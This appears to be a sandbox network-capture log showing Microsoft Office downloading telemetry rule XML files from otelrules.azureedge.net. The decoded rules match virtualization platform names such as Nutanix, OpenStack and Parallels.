                                                                        2024-12-03 16:50:49 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        71192.168.2.44982813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:48 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:49 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:48 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 419
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                        ETag: "0x8DC582BB7F164C3"
                                                                        x-ms-request-id: 2fc5819c-d01e-002b-4a95-4325fb000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165048Z-174f7845968pf68xhC1EWRr4h800000016f000000000bcd3
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        72192.168.2.44983013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:48 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:49 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:48 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 419
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                        ETag: "0x8DC582B9FF95F80"
                                                                        x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165048Z-174f784596886s2bhC1EWR743w000000166g00000000kkzw
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        73192.168.2.44983113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:48 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:49 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:48 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 472
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                        ETag: "0x8DC582BB650C2EC"
                                                                        x-ms-request-id: 8909076a-001e-00a2-6343-40d4d5000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165048Z-174f784596886s2bhC1EWR743w00000016a0000000005aye
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        74192.168.2.44983213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:49 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:49 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:49 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 468
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                        ETag: "0x8DC582BB3EAF226"
                                                                        x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165049Z-174f7845968xr5c2hC1EWRd0hn0000000qzg00000000psch
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:49 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        75192.168.2.44983313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:51 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:51 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:51 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 485
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                        ETag: "0x8DC582BB9769355"
                                                                        x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165051Z-174f7845968px8v7hC1EWR08ng00000016eg00000000f7yh
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:51 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        76192.168.2.44983413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:51 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:51 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:51 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 411
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                        ETag: "0x8DC582B989AF051"
                                                                        x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165051Z-174f7845968kdththC1EWRzvxn0000000kh000000000h5pa
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:51 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        77192.168.2.44983513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:51 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:51 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:51 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 427
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                        ETag: "0x8DC582BB556A907"
                                                                        x-ms-request-id: c5a3d3a8-601e-003e-1af8-443248000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165051Z-174f7845968cs2nkhC1EWR2tq000000001wg00000000d3b3
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:51 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        78192.168.2.44983613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:51 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:51 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:51 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 470
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                        ETag: "0x8DC582BBB181F65"
                                                                        x-ms-request-id: 1401d51e-801e-0067-0fb2-42fe30000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165051Z-174f7845968px8v7hC1EWR08ng00000016eg00000000f7z2
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:51 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        79192.168.2.44983713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:51 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:51 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:51 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 502
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                        ETag: "0x8DC582BB6A0D312"
                                                                        x-ms-request-id: 4680a0b7-201e-003c-6bc7-4330f9000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165051Z-174f7845968psccphC1EWRuz9s00000016f000000000cpek
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:51 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        80192.168.2.44983913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:53 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:54 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:53 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 474
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                        x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165053Z-174f7845968n2hr8hC1EWR9cag00000015t000000000qbdf
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:54 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        81192.168.2.44984113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:53 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:54 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:53 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 469
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                        x-ms-request-id: 29785dea-d01e-008e-30ff-44387a000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165053Z-174f7845968cpnpfhC1EWR3afc00000015ug00000000dm22
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
